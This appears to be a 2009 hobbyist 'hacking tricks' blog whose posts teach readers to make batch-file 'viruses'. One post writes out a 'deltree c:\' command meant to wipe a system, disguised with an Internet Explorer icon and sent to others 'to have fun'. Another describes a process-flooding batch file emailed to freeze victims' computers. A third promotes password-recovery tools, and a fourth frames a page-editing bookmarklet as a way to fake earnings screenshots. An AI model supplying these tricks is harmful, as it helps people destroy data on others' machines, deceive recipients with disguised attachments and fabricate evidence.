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Friday, October 2, 2009

Are you interseted doing risky thing in your PC? If yes than here i will tell you some thing that you will be surprised...
Today i will give  you a trick to make your own virus which is very deadly and destroys that whole system.

Follow the clues given below :
1.Open note pad
2.Type " @echo off deltree c:\ " in the notepad. Like this

 3.Then save the file as "virus.bat" like this

4.Then change the icon of that file by opening its property. for example i change it into internet exploror.

5.Now your virus is ready.

6.Start sending to other's and have fun.
*Note: Please dont try this in your own PC.
Enjoy :)

rOsH         1 comment:

Thursday, October 1, 2009

Heyy guys today iam going to tell you all about freezing someone's computer by sending them E-mails in which you have to send some file formatted  *.bat.
The file that should be created to send to the others email cand me made by following clues :

1.Go to start and open notepad
2. Type "Start" vertically for more than 50 times.Like this

 3.Then save the file as Name.bat. Here i save it as the name virus.bat.Like this

4.Send it to others Email
5.You are done!. When other will download this file and open that file their computer will be freezed thike this

    rOsH         1 comment:

    Friday, September 11, 2009

    Download the best password recovery tools to recover your passwords
    Download here:
    1. Messenger passwords
    2.Email password
    2.Internet explorer password
    4.Protected password of IE and Mail
    5.Dailup password
    6.Asterisk Logger
    7. Asterwin
    8.Network password
    9.VNC password

    Enjoy :)
    please pass your comments

    Friday, September 4, 2009

    Hey guys today i will show to do a funny hacking trick that can be done to edit any web pages's appearence.

    For that jou just need simple java code that i will surely giving it to you all.
    For example i will try it to my adsense earnings reports.


    Follow the steps given below:
    1.Open the page that you want to hack.
    2.Copy this code " javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 " and paste it on the adress bar of that page.
    3.Edit what ever you want.
    4.Copy this code "javascript:document.body.contentEditable='false'; document.designMode='off'; void 0" and paste it on the adress bar.This will deactivate the “modify” function and the adsense report page will function like normal. To remove all traces of all tweaking done, click on the URL location box and hit the [Esc] key. Next, click anywhere on the screen.

    Now you are done!!
    Enjoy :)

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